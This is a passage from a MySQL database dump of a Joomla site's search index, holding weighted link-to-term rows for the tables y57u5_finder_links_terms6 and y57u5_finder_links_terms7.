(254, 292080, 0.86331),
(254, 292081, 0.95669),
(254, 292082, 0.95669),
(254, 292083, 1.14331),
(254, 292084, 1.00331),
(254, 292085, 1.02669),
(254, 292086, 1.02669),
(254, 292087, 0.95669),
(254, 292088, 0.88669),
(254, 292089, 0.95669),
(254, 292090, 0.91),
(254, 292091, 1.02669),
(254, 292092, 1.02669),
(254, 292093, 0.81669),
(254, 292094, 0.93331),
(254, 292095, 0.91),
(254, 292096, 1.07331),
(254, 292097, 0.84),
(254, 292098, 0.93331),
(254, 292099, 0.98),
(254, 292100, 0.23331),
(254, 292101, 0.91),
(254, 292102, 1.02669),
(254, 292103, 1.00331),
(254, 292104, 0.28),
(254, 292105, 0.93331),
(254, 292106, 1.09669),
(254, 292107, 1.07331),
(254, 292108, 1.14331),
(254, 292109, 1.00331),
(254, 292110, 1.02669),
(292, 292110, 1.02669),
(254, 292111, 1.00331),
(254, 292112, 0.91),
(254, 292113, 1.02669),
(254, 292114, 0.91),
(254, 292115, 1.02669),
(255, 292843, 1.14331),
(255, 292844, 1.26),
(255, 292845, 0.95669),
(255, 292846, 1.12),
(255, 292847, 2.00662),
(255, 292848, 1.16669),
(255, 292849, 1.12),
(255, 292850, 0.86331),
(255, 292851, 0.95669),
(255, 292852, 0.86331),
(255, 292853, 0.98),
(255, 292854, 1.02669),
(255, 292855, 1.00331),
(255, 292856, 1.12),
(255, 292857, 0.74662),
(255, 292858, 0.95669),
(255, 292859, 1.00331),
(255, 292860, 1.00331),
(255, 292861, 1.09669),
(255, 292862, 0.95669),
(255, 292863, 1.02669),
(255, 292864, 0.93331),
(255, 292865, 1.00331),
(255, 292866, 1.77338),
(255, 292867, 0.98),
(255, 292868, 1.02669),
(255, 292869, 0.93331),
(255, 292870, 1.07331),
(255, 292871, 1.23669),
(255, 292872, 1.05),
(255, 292873, 1.16669),
(255, 292874, 0.86331),
(255, 292875, 0.93331),
(256, 293442, 0.84),
(256, 293443, 0.95669),
(256, 293444, 0.98),
(256, 293445, 0.98),
(256, 293446, 1.05),
(256, 293447, 0.95669),
(256, 293448, 1.05),
(256, 293449, 1.09669),
(256, 293450, 1.21331),
(256, 293451, 0.88669),
(256, 293452, 0.98),
(256, 293453, 0.91),
(256, 293454, 1.02669),
(256, 293455, 1.82),
(256, 293456, 2.00662),
(256, 293457, 0.98),
(256, 293458, 2.00662),
(256, 293459, 0.69993),
(256, 293460, 0.91),
(256, 293461, 1.02669),
(256, 293462, 0.93331),
(256, 293463, 1.05),
(256, 293464, 0.98),
(256, 293465, 1.07331),
(256, 293466, 0.93331),
(256, 293467, 1.02669),
(256, 293468, 1.00331),
(256, 293469, 0.98),
(256, 293470, 1.05),
(256, 293471, 0.91),
(256, 293472, 1.02669),
(256, 293473, 1.77338),
(256, 293474, 1.00331),
(256, 293475, 1.00331),
(256, 293476, 0.95669),
(256, 293477, 1.05),
(257, 294452, 0.95669),
(257, 294453, 1.05),
(257, 294454, 0.95669),
(257, 294455, 1.05),
(257, 294456, 1.91338),
(257, 294457, 1.05),
(257, 294458, 1.16669),
(257, 294459, 1.00331),
(257, 294460, 1.07331),
(257, 294461, 0.98),
(257, 294462, 1.07331),
(257, 294463, 1.14331),
(257, 294464, 1.05),
(257, 294465, 1.05),
(257, 294466, 1.21331),
(257, 294467, 0.91),
(257, 294468, 1.05),
(257, 294469, 0.93331),
(257, 294470, 1.00331),
(306, 294470, 1.00331),
(257, 294471, 0.98),
(257, 294472, 1.16669),
(257, 294473, 0.86331),
(258, 295481, 0.91),
(258, 295482, 1.00331),
(258, 295483, 0.98),
(258, 295484, 0.95669),
(258, 295485, 1.14331),
(258, 295486, 1.02669),
(258, 295487, 0.95669),
(258, 295488, 1.02669),
(258, 295489, 1.12),
(258, 295490, 0.91),
(258, 295491, 1.02669),
(258, 295492, 0.32669),
(258, 295493, 1.05),
(258, 295494, 1.14331),
(258, 295495, 0.86331),
(258, 295496, 0.91),
(258, 295497, 0.98),
(258, 295498, 0.98),
(258, 295499, 1.05),
(258, 295500, 0.98),
(258, 295501, 1.07331),
(258, 295502, 0.18669),
(258, 295503, 0.88669),
(258, 295504, 1.02669),
(258, 295505, 0.98),
(258, 295506, 1.19),
(258, 295507, 1.07331),
(258, 295508, 1.05),
(258, 295509, 0.86331),
(258, 295510, 1.02669),
(258, 295511, 1.00331),
(258, 295512, 0.95669),
(258, 295513, 1.02669),
(261, 296633, 0.98),
(261, 296634, 0.98),
(261, 296635, 1.09669),
(261, 296636, 1.28331),
(261, 296637, 1.07331),
(261, 296638, 0.93331),
(261, 296639, 0.46669),
(261, 296640, 1.07331),
(261, 296641, 1.16669),
(261, 296642, 0.98),
(261, 296643, 0.93331),
(261, 296644, 0.91),
(261, 296645, 1.02669),
(261, 296646, 1.07331),
(261, 296647, 1.14331),
(261, 296648, 1.21331),
(292, 296649, 0.98),
(261, 296649, 1.96),
(261, 296650, 1.16669),
(261, 296651, 1.16669),
(261, 296652, 1.00331),
(261, 296653, 1.07331),
(261, 296654, 0.93331),
(261, 296655, 1.16669),
(261, 296656, 0.93331),
(261, 296657, 1.12),
(261, 296658, 1.16669),
(262, 297755, 0.98),
(262, 297756, 1.07331),
(262, 297757, 0.91),
(262, 297758, 1.07331),
(262, 297759, 1.02669),
(262, 297760, 0.91),
(262, 297761, 1.00331),
(262, 297762, 0.86331),
(262, 297763, 1.02669),
(262, 297764, 0.84),
(262, 297765, 1.02669),
(262, 297766, 0.95669),
(262, 297767, 1.21331),
(262, 297768, 0.91),
(262, 297769, 0.98),
(262, 297770, 0.95669),
(262, 297771, 1.00331),
(262, 297772, 0.93331),
(262, 297773, 1.02669),
(262, 297774, 1.28331),
(262, 297775, 1.00331),
(262, 297776, 1.12),
(262, 297777, 0.95669),
(262, 297778, 0.95669),
(262, 297779, 2.14662),
(262, 297780, 0.95669),
(262, 297781, 0.93331),
(262, 297782, 1.02669),
(262, 297783, 0.91),
(262, 297784, 0.95669),
(262, 297785, 1.09669),
(262, 297786, 0.37331),
(262, 297787, 0.98),
(262, 297788, 1.09669),
(262, 297789, 0.88669),
(262, 297790, 1.07331),
(262, 297791, 1.09669),
(262, 297792, 0.28),
(262, 297793, 1.05),
(262, 297794, 1.33),
(262, 297795, 0.18669),
(287, 297795, 0.37338),
(306, 297795, 0.37338),
(262, 297796, 0.88669),
(262, 297797, 0.95669),
(262, 297798, 1.07331),
(262, 297799, 1.21331),
(262, 297800, 1.07331),
(262, 297801, 1.19),
(262, 297802, 0.95669),
(262, 297803, 0.91),
(262, 297804, 1.05),
(262, 297805, 1.07331),
(262, 297806, 0.86331),
(262, 297807, 0.95669),
(262, 297808, 1.07331),
(262, 297809, 1.02669),
(263, 299720, 0.91),
(263, 299721, 1.00331),
(263, 299722, 0.98),
(263, 299723, 1.05),
(263, 299724, 0.84),
(263, 299725, 0.93331),
(263, 299726, 0.95669),
(263, 299727, 1.09669),
(263, 299728, 1.02669),
(263, 299729, 1.00331),
(263, 299730, 0.91),
(263, 299731, 1.00331),
(263, 299732, 0.86331),
(263, 299733, 0.95669),
(263, 299734, 0.86331),
(263, 299735, 1.02669),
(263, 299736, 0.93331),
(263, 299737, 1.12),
(263, 299738, 0.88669),
(263, 299739, 0.98),
(263, 299740, 0.91),
(263, 299741, 0.98),
(263, 299742, 0.28),
(263, 299743, 1.00331),
(263, 299744, 1.09669),
(263, 299745, 0.93331),
(263, 299746, 1.05),
(263, 299747, 0.98),
(263, 299748, 1.07331),
(263, 299749, 0.23331),
(263, 299750, 0.93331),
(263, 299751, 1.02669),
(263, 299752, 0.91),
(263, 299753, 1.00331),
(263, 299754, 0.28),
(263, 299755, 1.05),
(263, 299756, 1.14331),
(263, 299757, 0.93331),
(263, 299758, 1.14331),
(263, 299759, 1.14331),
(264, 300563, 1.02669),
(264, 300564, 1.09669),
(264, 300565, 0.91),
(264, 300566, 1.14331),
(264, 300567, 1.07331),
(264, 300568, 0.91),
(264, 300569, 1.00331),
(264, 300570, 0.28),
(264, 300571, 0.86331),
(264, 300572, 0.95669),
(264, 300573, 0.84),
(264, 300574, 0.91),
(267, 301241, 0.98),
(267, 301242, 1.07331),
(267, 301243, 0.93331),
(267, 301244, 0.95669),
(267, 301245, 0.91),
(267, 301246, 1.00331),
(267, 301247, 0.91),
(267, 301248, 1.02669),
(267, 301249, 0.93331),
(306, 301249, 0.93331),
(267, 301250, 1.07331),
(267, 301251, 0.88669),
(267, 301252, 1.07331),
(267, 301253, 0.98),
(267, 301254, 0.91),
(267, 301255, 0.98),
(267, 301256, 0.84),
(267, 301257, 1.05),
(267, 301258, 1.02669),
(267, 301259, 0.93331),
(267, 301260, 1.07331),
(267, 301261, 0.32669),
(267, 301262, 0.93331),
(267, 301263, 1.02669),
(267, 301264, 0.93331),
(267, 301265, 1.05),
(267, 301266, 0.18669),
(267, 301267, 0.93331),
(267, 301268, 1.05),
(267, 301269, 1.00331),
(267, 301270, 0.86331),
(267, 301271, 0.93331),
(268, 302243, 1.00331),
(268, 302244, 0.42),
(268, 302245, 1.00331),
(268, 302246, 1.21331),
(268, 302247, 1.09669),
(268, 302248, 0.95669),
(268, 302249, 1.09669),
(268, 302250, 0.93331),
(268, 302251, 1.12),
(268, 302252, 0.95669),
(268, 302253, 1.05),
(268, 302254, 1.00331),
(268, 302255, 1.12),
(268, 302256, 0.95669),
(268, 302257, 1.09669),
(268, 302258, 1.05),
(268, 302259, 1.09669),
(268, 302260, 0.95669),
(268, 302261, 1.05),
(268, 302262, 0.93331),
(268, 302263, 1.05),
(268, 302264, 0.93331),
(268, 302265, 1.00331),
(268, 302266, 0.98),
(268, 302267, 1.07331),
(268, 302268, 1.00331),
(268, 302269, 1.23669),
(268, 302270, 0.91),
(268, 302271, 0.98),
(268, 302272, 0.86331),
(306, 302272, 0.86331),
(268, 302273, 1.09669),
(268, 302274, 1.77338),
(268, 302275, 0.98);
INSERT INTO `y57u5_finder_links_terms6` (`link_id`, `term_id`, `weight`) VALUES
(268, 302276, 1.05),
(268, 302277, 1.00331),
(268, 302278, 0.86331),
(268, 302279, 0.95669),
(268, 302280, 0.95669),
(268, 302281, 1.02669),
(268, 302282, 1.12),
(268, 302283, 0.95669),
(268, 302284, 1.02669),
(268, 302285, 1.12),
(268, 302286, 1.02669),
(268, 302287, 0.93331),
(268, 302288, 1.05),
(268, 302289, 0.95669),
(268, 302290, 1.02669),
(268, 302291, 0.91),
(268, 302292, 1.05),
(268, 302293, 0.91),
(305, 302293, 0.91),
(268, 302294, 0.98),
(268, 302295, 1.72662),
(268, 302296, 0.95669),
(268, 302297, 0.93331),
(269, 303237, 0.32669),
(269, 303238, 1.00331),
(269, 303239, 1.07331),
(269, 303240, 0.98),
(269, 303241, 1.07331),
(269, 303242, 0.91),
(269, 303243, 1.09669),
(269, 303244, 1.05),
(269, 303245, 0.23331),
(269, 303246, 0.91),
(269, 303247, 1.09669),
(269, 303248, 0.28),
(269, 303249, 0.95669),
(269, 303250, 1.00331),
(269, 303251, 1.02669),
(269, 303252, 1.19),
(306, 303253, 0.91),
(269, 303253, 1.82),
(306, 303254, 1.02669),
(269, 303254, 2.05338),
(269, 303255, 0.91),
(269, 303256, 0.98),
(272, 303960, 0.28),
(272, 303961, 0.91),
(272, 303962, 1.00331),
(274, 304356, 1.02669),
(274, 304357, 1.30669),
(274, 304358, 1.00331),
(274, 304359, 0.93331),
(274, 304360, 0.98),
(274, 304361, 0.93331),
(274, 304362, 1.09669),
(274, 304363, 0.93331),
(274, 304364, 0.88669),
(274, 304365, 1.09669),
(274, 304366, 0.88669),
(274, 304367, 1.09669),
(274, 304368, 0.95669),
(274, 304369, 1.09669),
(274, 304370, 1.00331),
(274, 304371, 0.37331),
(306, 304371, 1.11993),
(274, 304372, 1.05),
(274, 304373, 1.14331),
(275, 305276, 0.95669),
(275, 305277, 0.91),
(275, 305278, 1.02669),
(275, 305279, 0.37331),
(288, 305279, 0.37331),
(275, 305280, 0.95669),
(275, 305281, 1.14331),
(275, 305282, 1.05),
(275, 305283, 0.95669),
(275, 305284, 1.05),
(275, 305285, 0.60669),
(275, 305286, 1.09669),
(275, 305287, 1.30669),
(275, 305288, 0.86331),
(275, 305289, 0.95669),
(275, 305290, 1.00331),
(275, 305291, 1.14331),
(275, 305292, 0.88669),
(275, 305293, 0.98),
(275, 305294, 0.86331),
(306, 305294, 0.86331),
(275, 305295, 0.95669),
(306, 305295, 0.95669),
(275, 305296, 0.84),
(275, 305297, 1.00331),
(287, 312903, 0.93331),
(287, 312904, 0.98),
(287, 312905, 0.23331),
(287, 312906, 0.93331),
(287, 312907, 1.05),
(287, 312908, 0.32669),
(287, 312909, 0.93331),
(287, 312910, 1.00331),
(287, 312911, 1.68),
(287, 312912, 0.98),
(287, 312913, 0.98),
(287, 312914, 0.32669),
(287, 312915, 1.02669),
(288, 313625, 0.88669),
(288, 313626, 1.00331),
(288, 313627, 0.95669),
(288, 313628, 0.95669),
(288, 313629, 1.02669),
(288, 313630, 0.98),
(288, 313631, 1.07331),
(306, 313631, 1.07331),
(288, 313632, 1.16669),
(306, 313632, 1.16669),
(288, 313633, 0.98),
(288, 313634, 0.37331),
(288, 313635, 0.95669),
(288, 313636, 1.00331),
(288, 313637, 0.95669),
(288, 313638, 1.07331),
(288, 313639, 0.46669),
(288, 313640, 1.02669),
(288, 313641, 1.28331),
(288, 313642, 0.95669),
(288, 313643, 1.05),
(288, 313644, 1.07331),
(288, 313645, 1.05),
(288, 313646, 0.98),
(288, 313647, 0.98),
(288, 313648, 1.05),
(288, 313649, 0.95669),
(288, 313650, 1.07331),
(288, 313651, 1.09669),
(288, 313652, 1.35331),
(288, 313653, 1.00331),
(288, 313654, 1.00331),
(288, 313655, 1.12),
(288, 313656, 1.02669),
(288, 313657, 1.09669),
(288, 313658, 1.09669),
(288, 313659, 0.93331),
(288, 313660, 1.16669),
(288, 313661, 1.05),
(290, 315583, 0.86331),
(290, 315584, 1.02669),
(290, 315585, 0.93331),
(290, 315586, 0.98),
(290, 315587, 0.88669),
(290, 315588, 0.98),
(290, 315589, 1.07331),
(290, 315590, 1.19),
(290, 315591, 1.96),
(290, 315592, 0.98),
(290, 315593, 1.02669),
(290, 315594, 0.88669),
(292, 317716, 1.00331),
(292, 317717, 1.09669),
(292, 317718, 0.93331),
(292, 317719, 1.05),
(292, 317720, 0.93331),
(292, 317721, 1.02669),
(292, 317722, 0.93331),
(292, 317723, 0.98),
(292, 317724, 0.95669),
(292, 317725, 1.02669),
(292, 317726, 1.02669),
(292, 317727, 0.79331),
(306, 317727, 0.79331),
(292, 317728, 0.91),
(292, 317729, 0.84),
(306, 317729, 0.84),
(292, 317730, 0.95669),
(292, 317731, 0.86331),
(292, 317732, 0.93331),
(292, 317733, 0.81669),
(292, 317734, 0.88669),
(292, 317735, 0.84),
(292, 317736, 0.93331),
(292, 317737, 0.84),
(292, 317738, 1.09669),
(292, 317739, 0.91),
(292, 317740, 1.05),
(292, 317741, 0.93331),
(292, 317742, 0.98),
(292, 317743, 0.88669),
(306, 317743, 0.88669),
(292, 317744, 0.98),
(292, 317745, 0.32669),
(304, 317745, 0.32669),
(292, 317746, 0.91),
(292, 317747, 1.07331),
(292, 317748, 0.93331),
(292, 317749, 1.14331),
(292, 317750, 1.02669),
(292, 317751, 0.98),
(292, 317752, 1.09669),
(292, 317753, 0.37331),
(292, 317754, 1.07331),
(292, 317755, 1.19),
(292, 317756, 0.32669),
(292, 317757, 0.98),
(292, 317758, 1.23669),
(292, 317759, 0.88669),
(292, 317760, 1.07331),
(292, 317761, 0.95669),
(292, 317762, 1.16669),
(292, 317763, 1.82),
(292, 317764, 2.00662),
(295, 318690, 0.46662),
(295, 318691, 0.91),
(295, 318692, 1.05),
(295, 318693, 0.93331),
(295, 318694, 1.12),
(295, 318695, 1.07331),
(295, 318696, 1.16669),
(295, 318697, 0.23331),
(295, 318698, 1.00331),
(295, 318699, 1.09669),
(295, 318700, 0.98),
(295, 318701, 1.07331),
(298, 320244, 1.02669),
(304, 320244, 1.02669),
(308, 320244, 1.02669),
(298, 320245, 1.21331),
(304, 320245, 1.21331),
(308, 320245, 1.21331),
(298, 320246, 0.93331),
(298, 320247, 1.14331),
(298, 320248, 0.98),
(308, 320248, 0.98),
(298, 320249, 1.07331),
(308, 320249, 1.07331),
(298, 320250, 1.00331),
(308, 320250, 1.00331),
(298, 320251, 1.12),
(308, 320251, 1.12),
(298, 320252, 0.37331),
(308, 320252, 0.37331),
(298, 320253, 1.05),
(308, 320253, 1.05),
(298, 320254, 1.09669),
(308, 320254, 1.09669),
(298, 320255, 0.42),
(298, 320256, 1.07331),
(298, 320257, 1.16669),
(298, 320258, 1.09669),
(308, 320258, 1.09669),
(298, 320259, 1.21331),
(308, 320259, 1.21331),
(298, 320260, 1.12),
(308, 320260, 1.12),
(299, 321122, 0.98),
(299, 321123, 1.09669),
(299, 321124, 0.91),
(299, 321125, 1.19),
(299, 321126, 1.02669),
(299, 321127, 1.23669),
(299, 321128, 1.07331),
(299, 321129, 0.86331),
(299, 321130, 1.00331),
(299, 321131, 1.00331),
(299, 321132, 0.98),
(299, 321133, 0.18669),
(299, 321134, 0.88669),
(299, 321135, 1.05),
(299, 321136, 0.84),
(299, 321137, 0.91),
(299, 321138, 1.00331),
(299, 321139, 1.12),
(299, 321140, 1.02669),
(299, 321141, 0.93331),
(299, 321142, 1.07331),
(299, 321143, 0.91),
(299, 321144, 1.05),
(299, 321145, 0.86331),
(299, 321146, 0.98),
(299, 321147, 0.84),
(299, 321148, 0.91),
(299, 321149, 0.81669),
(299, 321150, 0.93331),
(299, 321151, 0.86331),
(299, 321152, 0.95669),
(299, 321153, 0.88669),
(299, 321154, 0.93331),
(299, 321155, 0.86331),
(299, 321156, 0.98),
(299, 321157, 0.37331),
(299, 321158, 1.07331),
(299, 321159, 1.16669),
(299, 321160, 0.93331),
(299, 321161, 0.86331),
(299, 321162, 0.95669),
(299, 321163, 1.02669),
(299, 321164, 0.88669),
(306, 321164, 0.88669),
(299, 321165, 1.09669),
(299, 321166, 1.07331),
(299, 321167, 1.14331),
(299, 321168, 0.93331),
(299, 321169, 1.07331),
(299, 321170, 0.91),
(299, 321171, 1.02669),
(299, 321172, 0.86331),
(299, 321173, 0.95669),
(299, 321174, 0.91),
(299, 321175, 1.16669),
(299, 321176, 0.88669),
(299, 321177, 0.98),
(299, 321178, 0.86331),
(299, 321179, 1.02669),
(299, 321180, 0.88669),
(299, 321181, 1.00331),
(299, 321182, 0.95669),
(299, 321183, 1.07331),
(299, 321184, 0.86331),
(299, 321185, 0.98),
(299, 321186, 0.28),
(299, 321187, 0.93331),
(299, 321188, 1.07331),
(304, 325164, 0.93331),
(304, 325165, 1.05),
(304, 325166, 1.00331),
(304, 325167, 0.95669),
(304, 325168, 1.05),
(304, 325169, 1.14331),
(304, 325170, 1.12),
(304, 325171, 1.02669),
(304, 325172, 0.51331),
(304, 325173, 1.05),
(304, 325174, 1.19),
(304, 325175, 0.88669),
(306, 325175, 0.88669),
(304, 325176, 0.95669),
(304, 325177, 0.93331),
(304, 325178, 1.00331),
(304, 325179, 0.23331),
(304, 325180, 1.05),
(304, 325181, 1.14331),
(304, 325182, 0.93331),
(304, 325183, 1.02669),
(304, 325184, 1.07331),
(304, 325185, 1.12),
(304, 325186, 0.23331),
(304, 325187, 0.91),
(304, 325188, 0.98),
(304, 325189, 0.86331),
(304, 325190, 0.95669),
(304, 325191, 0.95669),
(304, 325192, 1.07331),
(305, 326322, 1.05),
(305, 326323, 0.98),
(305, 326324, 1.00331),
(305, 326325, 1.07331),
(305, 326326, 0.95669),
(305, 326327, 1.02669),
(305, 326328, 0.84),
(305, 326329, 0.88669),
(305, 326330, 1.00331),
(305, 326331, 1.05),
(305, 326332, 1.23669),
(305, 326333, 1.00331),
(305, 326334, 0.93331),
(305, 326335, 1.02669),
(305, 326336, 1.00331),
(305, 326337, 0.32669),
(305, 326338, 0.91),
(305, 326339, 1.00331),
(305, 326340, 0.86331),
(305, 326341, 0.98),
(305, 326342, 1.09669),
(305, 326343, 0.93331),
(305, 326344, 1.00331),
(305, 326345, 1.23669),
(305, 326346, 1.05),
(306, 327762, 1.02669),
(306, 327763, 1.14331),
(306, 327764, 0.95669),
(306, 327765, 1.23669),
(306, 327766, 0.98),
(306, 327767, 0.91),
(306, 327768, 1.02669),
(306, 327769, 0.91),
(306, 327770, 1.09669),
(306, 327771, 1.12),
(306, 327772, 0.28),
(306, 327773, 0.98),
(306, 327774, 1.16669),
(306, 327775, 0.23331),
(306, 327776, 0.88669),
(306, 327777, 1.05),
(306, 327778, 0.86331),
(306, 327779, 1.05),
(306, 327780, 1.02669),
(306, 327781, 1.00331),
(306, 327782, 0.23331),
(306, 327783, 0.91),
(306, 327784, 1.02669),
(306, 327785, 1.05),
(306, 327786, 1.00331),
(306, 327787, 0.84),
(306, 327788, 0.95669),
(306, 327789, 0.86331),
(306, 327790, 0.95669),
(306, 327791, 0.93331),
(306, 327792, 0.93331),
(306, 327793, 1.02669),
(306, 327794, 1.02669),
(306, 327795, 0.98),
(306, 327796, 0.28),
(306, 327797, 0.98),
(306, 327798, 1.21331),
(306, 327799, 0.93331),
(306, 327800, 1.12),
(306, 327801, 0.95669),
(306, 327802, 1.00331),
(306, 327803, 1.09669),
(306, 327804, 1.14331),
(306, 327805, 1.09669),
(306, 327806, 1.14331),
(306, 327807, 0.98),
(306, 327808, 1.09669),
(306, 327809, 0.56),
(306, 327810, 1.07331),
(306, 327811, 1.19),
(306, 327812, 0.86331),
(306, 327813, 1.07331),
(306, 327814, 0.88669),
(306, 327815, 1.07331),
(306, 327816, 0.93331),
(306, 327817, 1.02669),
(306, 327818, 0.98),
(306, 327819, 1.00331),
(306, 327820, 1.12),
(306, 327821, 1.00331),
(306, 327822, 1.09669),
(306, 327823, 0.98),
(306, 327824, 1.05),
(306, 327825, 0.93331),
(306, 327826, 1.00331),
(306, 327827, 0.95669),
(306, 327828, 1.19),
(306, 327829, 1.00331),
(306, 327830, 0.37331),
(306, 327831, 0.93331),
(306, 327832, 1.14331),
(306, 327833, 1.00331),
(306, 327834, 1.07331),
(306, 327835, 1.68),
(306, 327836, 0.93331),
(306, 327837, 0.91),
(306, 327838, 0.91),
(306, 327839, 1.16669),
(306, 327840, 0.88669),
(306, 327841, 0.95669),
(306, 327842, 1.91338),
(306, 327843, 1.16669),
(306, 327844, 1.16669),
(308, 328940, 1.05),
(308, 328941, 1.14331),
(308, 328942, 1.05),
(308, 328943, 1.14331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms7`
--

CREATE TABLE `y57u5_finder_links_terms7` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms7`
--

INSERT INTO `y57u5_finder_links_terms7` (`link_id`, `term_id`, `weight`) VALUES
(31, 340, 0.28),
(159, 340, 0.28),
(160, 340, 0.28),
(250, 340, 0.28),
(251, 340, 0.28),
(31, 341, 0.98),
(159, 341, 0.98),
(160, 341, 0.98),
(250, 341, 0.98),
(251, 341, 0.98),
(31, 342, 1.09669),
(159, 342, 1.09669),
(160, 342, 1.09669),
(250, 342, 1.09669),
(251, 342, 1.09669),
(31, 343, 0.14),
(159, 343, 0.14),
(160, 343, 0.14),
(178, 343, 0.14),
(239, 343, 0.14),
(248, 343, 0.14),
(250, 343, 0.14),
(251, 343, 0.14),
(268, 343, 0.42),
(31, 344, 0.86331),
(159, 344, 0.86331),
(160, 344, 0.86331),
(250, 344, 0.86331),
(251, 344, 0.86331),
(31, 345, 0.98),
(159, 345, 0.98),
(160, 345, 0.98),
(250, 345, 0.98),
(251, 345, 0.98),
(299, 346, 0.035),
(298, 346, 0.0525),
(301, 346, 0.0525),
(304, 346, 0.1225),
(233, 346, 0.14),
(249, 346, 0.14),
(265, 346, 0.14),
(266, 346, 0.14),
(267, 346, 0.14),
(305, 346, 0.245),
(31, 346, 0.28),
(236, 346, 0.28),
(237, 346, 0.28),
(250, 346, 0.28),
(251, 346, 0.28),
(262, 346, 0.28),
(272, 346, 0.28),
(244, 346, 0.42),
(248, 346, 0.42),
(252, 346, 0.42),
(255, 346, 0.42),
(270, 346, 0.42),
(273, 346, 0.42),
(274, 346, 0.42),
(280, 346, 0.42),
(288, 346, 0.42),
(308, 346, 0.42),
(159, 346, 0.56),
(160, 346, 0.56),
(239, 346, 0.56),
(246, 346, 0.56),
(247, 346, 0.56),
(258, 346, 0.56),
(275, 346, 0.56),
(242, 346, 0.7),
(257, 346, 0.7),
(259, 346, 0.7),
(260, 346, 0.7),
(263, 346, 0.7),
(269, 346, 0.7),
(292, 346, 0.7),
(240, 346, 0.84),
(241, 346, 0.84),
(256, 346, 0.84),
(264, 346, 0.84),
(254, 346, 0.98),
(290, 346, 0.98),
(174, 346, 1.12),
(235, 346, 1.26),
(243, 346, 1.26),
(261, 346, 1.26),
(268, 346, 1.26),
(238, 346, 1.54),
(193, 346, 1.82),
(306, 346, 1.82),
(178, 346, 2.38),
(31, 347, 0.88669),
(159, 347, 0.88669),
(160, 347, 0.88669),
(241, 347, 0.88669),
(250, 347, 0.88669),
(251, 347, 0.88669),
(254, 347, 0.88669),
(304, 347, 0.88669),
(31, 348, 0.95669),
(159, 348, 0.95669),
(160, 348, 0.95669),
(250, 348, 0.95669),
(251, 348, 0.95669),
(31, 349, 0.86331),
(159, 349, 0.86331),
(160, 349, 0.86331),
(239, 349, 0.86331),
(242, 349, 0.86331),
(250, 349, 0.86331),
(251, 349, 0.86331),
(256, 349, 0.86331),
(258, 349, 0.86331),
(305, 349, 0.86331),
(306, 349, 0.86331),
(178, 349, 1.72662),
(235, 349, 1.72662),
(241, 349, 1.72662),
(31, 350, 1.09669),
(159, 350, 1.09669),
(160, 350, 1.09669),
(250, 350, 1.09669),
(251, 350, 1.09669),
(304, 354, 0.04081),
(31, 354, 0.32669),
(159, 354, 0.32669),
(160, 354, 0.32669),
(178, 354, 0.32669),
(193, 354, 0.32669),
(238, 354, 0.32669),
(242, 354, 0.32669),
(243, 354, 0.32669),
(246, 354, 0.32669),
(250, 354, 0.32669),
(251, 354, 0.32669),
(255, 354, 0.32669),
(269, 354, 0.32669),
(272, 354, 0.32669),
(273, 354, 0.32669),
(280, 354, 0.32669),
(31, 355, 0.93331),
(159, 355, 0.93331),
(160, 355, 0.93331),
(250, 355, 0.93331),
(251, 355, 0.93331),
(31, 356, 1.02669),
(159, 356, 1.02669),
(160, 356, 1.02669),
(250, 356, 1.02669),
(251, 356, 1.02669),
(31, 522, 0.46669),
(233, 522, 0.46669),
(250, 522, 0.46669),
(251, 522, 0.46669),
(262, 522, 0.46669),
(263, 522, 0.46669),
(275, 522, 0.46669),
(174, 522, 0.93338),
(237, 522, 0.93338),
(239, 522, 0.93338),
(292, 522, 0.93338),
(306, 522, 0.93338),
(31, 523, 1.05),
(250, 523, 1.05),
(251, 523, 1.05),
(31, 524, 1.19),
(250, 524, 1.19),
(251, 524, 1.19),
(31, 525, 0.32669),
(160, 525, 0.32669),
(250, 525, 0.32669),
(251, 525, 0.32669),
(31, 526, 1.05),
(160, 526, 1.05),
(250, 526, 1.05),
(251, 526, 1.05),
(31, 527, 1.12),
(160, 527, 1.12),
(250, 527, 1.12),
(251, 527, 1.12),
(295, 528, 0.01169),
(301, 528, 0.04676),
(31, 528, 0.09331),
(159, 528, 0.09331),
(160, 528, 0.09331),
(161, 528, 0.09331),
(168, 528, 0.09331),
(178, 528, 0.09331),
(246, 528, 0.09331),
(249, 528, 0.09331),
(250, 528, 0.09331),
(251, 528, 0.09331),
(255, 528, 0.09331),
(258, 528, 0.09331),
(259, 528, 0.09331),
(260, 528, 0.09331),
(267, 528, 0.09331),
(272, 528, 0.09331),
(280, 528, 0.09331),
(290, 528, 0.09331),
(306, 528, 0.09331),
(174, 528, 0.18662),
(236, 528, 0.18662),
(239, 528, 0.18662),
(240, 528, 0.18662),
(241, 528, 0.18662),
(243, 528, 0.18662),
(244, 528, 0.18662),
(253, 528, 0.18662),
(263, 528, 0.18662),
(268, 528, 0.18662),
(288, 528, 0.18662),
(292, 528, 0.18662),
(193, 528, 0.27993),
(248, 528, 0.27993),
(261, 528, 0.27993),
(270, 528, 0.37324),
(262, 528, 0.46655),
(31, 529, 0.84),
(159, 529, 0.84),
(160, 529, 0.84),
(250, 529, 0.84),
(251, 529, 0.84),
(31, 530, 0.95669),
(159, 530, 0.95669),
(160, 530, 0.95669),
(250, 530, 0.95669),
(251, 530, 0.95669),
(31, 531, 0.09331),
(159, 531, 0.09331),
(160, 531, 0.09331),
(193, 531, 0.09331),
(237, 531, 0.09331),
(243, 531, 0.09331),
(247, 531, 0.09331),
(250, 531, 0.09331),
(251, 531, 0.09331),
(257, 531, 0.09331),
(259, 531, 0.09331),
(260, 531, 0.09331),
(275, 531, 0.09331),
(295, 531, 0.09331),
(305, 531, 0.09331),
(178, 531, 0.18662),
(241, 531, 0.18662),
(261, 531, 0.18662),
(290, 531, 0.18662),
(306, 531, 0.18662),
(235, 531, 0.27993),
(256, 531, 0.27993),
(269, 531, 0.27993),
(240, 531, 0.37324),
(252, 531, 0.37324),
(254, 531, 0.37324),
(239, 531, 0.46655),
(242, 531, 0.46655),
(258, 531, 0.46655),
(265, 531, 0.46655),
(266, 531, 0.46655),
(292, 531, 0.46655),
(31, 532, 0.81669),
(159, 532, 0.81669),
(160, 532, 0.81669),
(250, 532, 0.81669),
(251, 532, 0.81669),
(305, 532, 0.81669),
(31, 533, 0.86331),
(159, 533, 0.86331),
(160, 533, 0.86331),
(250, 533, 0.86331),
